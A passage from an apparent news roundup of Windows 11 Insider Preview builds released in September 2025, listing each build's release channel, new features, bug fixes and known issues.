Everyone in the Dev Channel gets a variety of bug fixes, including one for developers that addresses an issue in which PIX on Windows was unable to play back GPU captures.
There are six known issues in this build, including one in which some searches may show unexpected text instead of the expected results and images.
(Get more info about Windows 11 Insider Preview Build 26220.6760.)
Windows 11 Insider Preview Build 27954
Release date: September 25, 2025
Released to: Canary Channel
This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. It also fixes one bug in which you might not be able to connect to shared files and folders if you were using the Server Message Block (SMB) v1 protocol on NetBIOS over TCP/IP (NetBT) after the latest updates.
There is one known issue in this build, in which PIX on Windows is unable to play back GPU captures on this OS version. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, if you are affected, you can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and get help via private builds.
(Get more info about Windows 11 Insider Preview Build 27954.)
Windows 11 Insider Preview Build 26120.6690
Release date: September 19, 2025
Released to: Beta Channel
For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let users translate on-screen text with just a few clicks.
All PCs that have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into the address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.
(Get more info about Windows 11 Insider Preview Build 26120.6690.)
Windows 11 Insider Preview Build 26220.6690
Release date: September 19, 2025
Released to: Dev Channel
This build is for those who have already upgraded to Windows 11 version 25H2.
For those who have Copilot+ PCs and have turned on a toggle to receive the latest update, this build gradually rolls out several new features, including one in which Click to Do can let you translate on-screen text with just a few clicks.
All PCs that have turned a toggle on to receive the latest updates get a variety of bug fixes rolled out gradually, including one in which File Explorer became unresponsive if a UNC server name was directly typed into the address bar. There are 10 known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.
(Get more info about Windows 11 Insider Preview Build 26220.6690.)
Windows 11 Insider Preview Build 27950
Release date: September 19, 2025
Released to: Canary Channel
This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows. In addition, Advanced Settings will revert to the previous “For Developers” experience after updating to this build.
There are also a number of bug fixes, including one in which the app preview windows in the taskbar became misaligned (away from the app icon you’d clicked / hovered over) after a display resolution change.
There are two known issues in this build, including one for developers in which PIX on Windows is unable to play back GPU captures. This will be addressed by a new PIX release, estimated to arrive by the end of September. In the meantime, anyone impacted can use the “Send Feedback” button in PIX or contact Microsoft on the DirectX Discord server and Microsoft can help provide private builds.
(Get more info about Windows 11 Insider Preview Build 27950.)
Windows 11 Insider Preview Builds 26100.6713 and 26200.6713
Release date: September 12, 2025
Released to: Release Preview Channel
Build 26100.6713 is for those on Windows 11 24H2, and 26200.6713 is for those on Windows 11 25H2.
These builds gradually roll out a large number of new features, including AI actions in File Explorer for editing images or summarizing documents, and the ability to pin favorite apps in the Windows share window to quickly access them when you need them.
The builds fix several bugs immediately, including one that disrupted Windows Update for those using Windows Server Update Services (WSUS). Additionally, several bug fixes are being gradually rolled out, including one for a bug in which, when Windows Sandbox was enabled, the VmmemCmFirstBoot process may have consumed large amounts of CPU after login, causing your PC to become unresponsive.
(Get more info about Windows 11 Insider Preview Builds 26100.6713 and 26200.6713.)
Windows 11 Insider Preview Build 26120.6682
Release date: September 12, 2025
Released to: Beta Channel
For those who have Copilot+ PCs and have turned the toggle on to receive the latest update, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot.
New emoji from Emoji 16.0 are being gradually rolled out in the emoji panel for those who have turned the toggle on to receive the latest updates.
The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.
There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.
(Get more info about Windows 11 Insider Preview Build 26120.6682.)
Windows 11 Insider Preview Build 26220.6682
Release date: September 12, 2025
Released to: Dev Channel
This build is for those who have already upgraded to Windows 11 version 25H2.
For those who have Copilot+ PCs and have turned the toggle on to receive the latest updates, this build gradually rolls out a new Copilot prompt box in Click to Do designed to streamline interaction with Microsoft Copilot. New emoji from Emoji 16.0 are also being gradually rolled out to the same group.
The same group also gets a variety of bug fixes rolled out gradually, including for one that caused some PCs to bug check (green screen) while hibernating, and another in which the Shared section in File Explorer Home was visible even if there was no content to display.
There are seven known issues in this build, including one in which the placeholder text in the Settings search box may appear vertically misaligned.
(Get more info about Windows 11 Insider Preview Build 26220.6682.)
Windows 11 Insider Preview Build 27943
Release date: September 11, 2025
Released to: Canary Channel
This build includes, in Microsoft’s words, “a small set of general improvements and fixes that improve the overall experience for Insiders running” Windows.
There are also a number of bug fixes, including for a bug that caused Settings > System > Storage > Temporary files to get stuck when scanning files. This issue also caused the entry to clean up previous Windows Installations to not show in Storage Settings.
There are five known issues in this build, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark, including “ACPI Audio Compositor” and others. Selecting Properties on these devices will show “Windows cannot load the device driver for this hardware. The driver may be corrupted or missing.”
(Get more info about Windows 11 Insider Preview Build 27943.)
Windows 11 Insider Preview Build 27938
Release date: September 8, 2025
Released to: Canary Channel
This build introduces AI actions into File Explorer. These offer new capabilities when you right-click a file, such as editing a graphic or summarizing a Word document. For now, there are four of them, all related to image files. You can perform a Bing search based on an image file, blur the background in an image, erase objects in an image, and remove the background in an image.
A number of bugs have been fixed, including one that caused Task Manager to freeze when going to the performance section, and another in which the red color used for a low space drive in This PC was unexpectedly light colored.
The build has five known issues, including one in which audio stops working and Device Manager shows one or more devices with a yellow exclamation mark.
(Get more info about Windows 11 Insider Preview Build 27938.)
Windows 11 Insider Preview Build 26120.5790
Release date: September 5, 2025
Released to: Beta Channel
For those who have Copilot+ PCs, this build introduces fluid dictation, which makes voice-based dictation easier. It automatically corrects grammar, punctuation, and filler words as you speak, reducing the need for manual editing. Also rolling out on supported Copilot+ PCs is the ability to use Studio Effect’s AI-powered camera enhancements with an additional, alternative camera, such as a USB webcam or your laptop’s built-in rear camera.
Those in the Beta Channel who have turned the toggle on to receive the latest updates get new on-hover actions in File Manager Home for faster file management.
The same group also gets a variety of bug fixes rolled out gradually, including one for a bug in which the right-click context menu in File Explorer sometimes unexpectedly switched back and forth between the normal initial view and “Show more options” with each right-click when certain apps were installed.
There are five known issues in this build, including one in which for some users, the Shared section in File Explorer Home may be visible even if there is no content to display.
(Get more info about Windows 11 Insider Preview Build 26120.5790.)
Windows 11 Insider Preview Build 26220.5790
Release date: September 5, 2025
Released to: Dev Channel
This build appears to be identical to Build 26120.5790 for the Beta Channel, detailed above.
(Get more info about Windows 11 Insider Preview Build 26220.5790.)